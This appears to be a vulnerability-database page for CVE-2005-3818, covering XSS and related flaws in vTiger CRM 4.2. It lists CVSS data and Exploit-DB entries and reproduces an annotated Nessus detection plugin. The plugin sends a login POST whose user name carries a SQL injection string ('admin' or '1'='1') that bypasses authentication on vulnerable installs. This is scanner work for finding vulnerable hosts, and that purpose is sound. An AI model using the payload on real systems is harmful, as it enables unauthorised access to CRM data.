Vulnerabilities > CVE-2005-3818 - Input Validation vulnerability in VTiger CRM

047910
CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
vtiger
nessus
exploit available

Summary

Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) various input fields, including the contact, lead, and first or last name fields, (2) the record parameter in a DetailView action in the Leads module for index.php, (3) the $_SERVER['PHP_SELF'] variable, which is used in multiple locations such as index.php, and (4) aggregated RSS feeds in the RSS aggregation module.

Exploit-Db

  • description: vtiger CRM 4.2 RSS Aggregation Module Feed XSS. CVE-2005-3818. Webapps exploit for php platform
    id: EDB-ID:26585
    last seen: 2016-02-03
    modified: 2005-11-24
    published: 2005-11-24
    reporter: Christopher Kunz
    source: https://www.exploit-db.com/download/26585/
    title: vtiger CRM 4.2 RSS Aggregation Module Feed XSS
  • description: vtiger CRM 4.2 Leads Module record Parameter XSS. CVE-2005-3818. Webapps exploit for php platform
    id: EDB-ID:26584
    last seen: 2016-02-03
    modified: 2005-11-24
    published: 2005-11-24
    reporter: Christopher Kunz
    source: https://www.exploit-db.com/download/26584/
    title: vtiger CRM 4.2 Leads Module record Parameter XSS

Nessus

NASL family: CGI abuses
NASL id: VTIGER_FLAWS.NASL
description: The remote version of this software is prone to arbitrary code execution, directory traversal, SQL injection (allowing authentication bypass), and cross-site scripting attacks.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20317
published: 2005-12-16
reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/20317
title: vTiger < 4.5a2 Multiple Vulnerabilities
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration.  Nessus runs this branch when it loads the script to
# collect metadata; the live check further down is not reached in that mode.
if (description)
{
  script_id(20317);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  # Seven CVEs from the same vtiger 4.2 advisories are reported together;
  # the live check below only exercises the authentication bypass.
  script_cve_id("CVE-2005-3818", "CVE-2005-3819", "CVE-2005-3820", "CVE-2005-3821", "CVE-2005-3822", "CVE-2005-3823", "CVE-2005-3824");
  script_bugtraq_id(15562, 15569);

  script_name(english:"vTiger < 4.5a2 Multiple Vulnerabilities");
  script_summary(english:"Checks for authentication bypass in vTiger");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple flaws.");
  script_set_attribute(attribute:"description", value:
"The remote version of this software is prone to arbitrary code
execution, directory traversal, SQL injection (allowing authentication
bypass), cross-site scripting attacks.");
  script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_232005.105.html");
  script_set_attribute(attribute:"see_also", value:"https://www.sec-consult.com/files/20051125_vtiger_crm.txt");
  script_set_attribute(attribute:"solution", value:"Upgrade to vtiger 4.5 alpha 2 or later.");
  # Aggregate CVSS2 vector for the whole CVE set (C:P/I:P/A:P); a single
  # entry such as the XSS-only CVE-2005-3818 is scored lower on its own.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  # NOTE(review): "exploit_available" is "false" although the temporal
  # vector says E:POC and public proof-of-concept entries for CVE-2005-3818
  # exist (EDB-ID 26584 and 26585) -- confirm whether this should be updated.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  # NOTE(review): CWE-89 (SQL injection) is absent from this list even
  # though the description and the live check are about SQL injection.
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"plugin_publication_date", value:"2005/12/16");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # NOTE(review): the live check submits a login form carrying an injection
  # payload and, on a vulnerable host, is answered with a logged-in page;
  # confirm ACT_GATHER_INFO is the intended category for a check with that
  # side effect on the target's session/audit state.
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  # Runs after http_version.nasl, needs a www service (default port 80) and
  # the www/PHP key; skipped when Settings/disable_cgi_scanning is set.
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

# Pick the HTTP port to test (default 80).  Embedded web servers are
# returned by the lookup but skipped on the next line.
port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
# vtiger is a PHP application; nothing to do if the port cannot serve PHP.
if (! can_host_php(port:port) ) exit(0);

# Loop through various directories.
# With thorough tests enabled, two vtiger-specific paths are probed in
# addition to the generic CGI directories; otherwise only cgi_dirs().
if (thorough_tests) dirs = list_uniq(make_list("/tigercrm", "/crm", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Fetch the front page of this candidate install (cached, keep-alive).
  # A null response exits the plugin, so the remaining directories are
  # not probed.
  res = http_get_cache_ka(item:string(dir, "/index.php"), port:port);
  if (isnull(res)) exit(0);

  # If it looks like vtiger...
  # Fingerprint: the vtiger favicon link or the vtiger.com disclaimer text.
  if (
    'HREF="include/images/vtigercrm_icon.ico">' >< res ||
    "vtiger.com is not affiliated with nor endorsed by" >< res
  ) {

    # Authentication-bypass probe: a login POST whose user_name carries a
    # string-comparison SQL injection; the other form fields hold ordinary
    # login values.  On a vulnerable host the reply is a logged-in page, so
    # this probably leaves a login record from the scanner's address in
    # vtiger's logs.
    filename = string(dir, "/index.php");
    variables = string("module=Users&action=Authenticate&return_module=Users&return_action=Login&user_name=admin%27+or+%271%27%3D%271&user_password=test&login_theme=blue&login_language=en_us&Login=++Login++");
    # Referer points back at the login page itself, as a browser form
    # submission would; Content-Length is derived from the encoded body.
    host=get_host_name();
    req = string(
      "POST ", filename, " HTTP/1.0\r\n", 
      "Referer: ","http://", host, filename, "\r\n",
      "Host: ", host, ":", port, "\r\n", 
      "Content-Type: application/x-www-form-urlencoded\r\n", 
      "Content-Length: ", strlen(variables), 
      "\r\n\r\n", 
      variables
    );
    # Response body only; a null reply again exits the plugin.
    result = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (isnull(result)) exit(0);

    # Markers the plugin treats as evidence of a logged-in page; seeing
    # either is taken to mean the injected credentials were accepted.
    if(
      # Link to My Account
      "?module=Users&action=DetailView&record=" >< result ||
      "New Contact" >< result
    ) {
      security_hole(port);
      # NOTE(review): both KB flags are set from the one SQL-injection
      # result; no XSS request is sent, so the XSS flag is inferred from
      # the affected version rather than observed.
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      # Report once per host: stop after the first vulnerable install.
      exit(0);
    }
  }
}